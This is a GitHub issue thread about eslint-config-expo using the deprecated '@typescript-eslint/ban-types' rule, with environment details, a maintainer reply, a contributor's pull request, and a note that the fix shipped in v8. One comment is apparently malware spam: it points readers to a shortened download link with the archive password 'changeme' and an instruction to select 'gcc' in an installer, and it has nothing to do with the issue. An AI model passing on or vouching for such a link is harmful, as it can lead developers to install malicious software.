### ISSUE TITLE
"@typescript-eslint/ban-types" deprecated but "eslint-config-expo" use it when put to extends

### ISSUE THREAD

**Issue by gendalf-thug** [expo/expo#31205]
### Minimal reproducible example

Setup "@typescript-eslint/eslint-plugin": 8.3.0 for expo project which use expo config for ESLint

### Where did you reproduce the issue?

in a development build

### Summary

https://github.com/user-attachments/assets/0e42a40e-639d-44c2-9c9e-943b2af59b9e

### Environment

expo-env-info 1.2.0 environment info:
    System:
      OS: macOS 14.6.1
      Shell: 5.9 - /bin/zsh
    Binaries:
      Node: 22.2.0 - /opt/homebrew/bin/node
      Yarn: 1.22.22 - /opt/homebrew/bin/yarn
      npm: 10.7.0 - /opt/homebrew/bin/npm
      Watchman: 2024.05.06.00 - /opt/homebrew/bin/watchman
    Managers:
      CocoaPods: 1.15.2 - /opt/homebrew/bin/pod
    SDKs:
      iOS SDK:
        Platforms: DriverKit 23.5, iOS 17.5, macOS 14.5, tvOS 17.5, visionOS 1.2, watchOS 10.5
    IDEs:
      Android Studio: 2023.3 AI-233.14808.21.2331.11842104
      Xcode: 15.4/15F31d - /usr/bin/xcodebuild
    npmPackages:
      expo: ~51.0.31 => 51.0.31 
      react: 18.3.1 => 18.3.1 
      react-native: 0.75.2 => 0.75.2 
    npmGlobalPackages:
      eas-cli: 10.2.4
    Expo Workflow: bare

### Expo Doctor Diagnostics

Not needed

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by brentvatne** [comment]
@gendalf-thug - thanks for the report! can you send a PR with your recommended fix?

**Comment by KimGnab** [comment]
> @gendalf-thug - thanks for the report! can you send a PR with your recommended fix?

Hello, I had the same issue and raised a pull request. Could you please check it out?

**Comment by Simek** [comment]
Hello everyone, the rules definition issue should be fixed with a new `v8` release:
* https://github.com/expo/expo/blob/main/packages/eslint-config-expo/CHANGELOG.md#800--2024-10-22
* https://github.com/expo/expo/pull/31571

If you are experiencing any problems after the upgrade, please create a new issue.
